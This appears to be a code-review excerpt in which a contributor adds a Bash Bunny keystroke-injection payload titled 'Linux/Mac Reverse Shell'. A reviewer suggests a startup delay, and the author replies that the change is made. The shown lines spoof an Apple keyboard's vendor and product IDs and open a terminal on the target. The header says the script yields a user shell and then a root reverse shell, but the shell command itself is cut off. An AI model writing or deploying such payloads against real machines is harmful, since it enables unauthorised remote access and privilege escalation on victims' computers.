payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt

```diff
@@ -0,0 +1,50 @@
+# Title:         Linux/Mac Reverse Shell
+# Author:        Darkprince(Sridhar)
+# Version:       1.0
+#
+# Runs a script in the background that gives a user shell initially and waits for user to
+# escalate privileges and give a root reverse shell
+#
+# Magenta..................Setup
+# Red,Green,Blue......Executing
+# Green....................Finished
+
+
+# INITIALIZING
+LED W
+
+# Mac keyboard works in linux and mac
+ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E
+
+LANGUAGE='us'
+
+# Make sure the switch position is 1
+
+# ATTACKING
+LED R G B
+
+# Get linux,mac Termial
+RUN UNITY xterm
```

Comment:
I would add a small delay before this, so the target has time to recognize the Bunny as a HID device. This ensures that nothing is skipped at the start of the payload.

Reply:
I did the necessary changes, please review it and merge it.